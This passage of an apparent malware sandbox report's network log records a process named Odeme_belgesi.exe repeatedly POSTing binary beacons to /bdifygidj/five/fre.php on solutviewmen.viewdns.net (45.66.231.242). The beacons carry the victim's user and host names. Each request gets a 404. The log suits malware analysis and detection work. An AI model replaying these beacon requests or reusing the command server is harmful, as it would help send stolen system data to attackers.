              Oct 1, 2024 10:55:01.929584026 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:02.665991068 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:34 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.44973445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:02.833983898 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:02.838931084 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:03.554172993 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:35 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.44973545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:03.730034113 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:03.734896898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:04.620654106 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:36 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.44973645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:04.786977053 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:04.791908979 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:05.540540934 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:37 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.44973745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:05.709995985 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:05.714855909 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:06.533355951 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:38 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.44973845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:06.685117960 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:06.689995050 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:10.377545118 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:42 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.44973945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:10.534509897 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:10.539446115 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:11.258225918 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:43 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.44974045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:11.424407005 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:11.431406975 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:12.104274988 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:44 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.44974145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:12.286014080 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:12.290925980 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:12.998677969 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:45 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.44974245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:13.151530981 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:13.156783104 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:13.904510975 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:46 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.44974445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:14.054187059 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:14.059014082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:14.895996094 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:47 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.44974745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:15.176146984 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:15.181876898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:15.839649916 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:48 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.44974945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:15.996802092 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:16.001641035 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:16.898814917 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:49 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.44975245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:17.052355051 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:17.057243109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:20.761219025 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:52 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.44975345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:20.931056023 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:20.935914040 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:21.654897928 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:53 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.44975445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:21.803811073 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:21.808725119 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:22.549278021 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:54 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.44975545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:22.695430994 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:22.700321913 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:23.470480919 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:55 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.44975645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:23.617074013 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:23.622009993 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:24.551815987 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:56 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.44975745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:24.711334944 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:24.716378927 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:25.375000954 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:57 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.44975845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:25.529371977 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:25.534367085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:26.195318937 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:58 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.44975945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:26.356507063 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:26.361457109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:27.085490942 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:59 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.44976045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:27.255765915 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:27.260785103 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
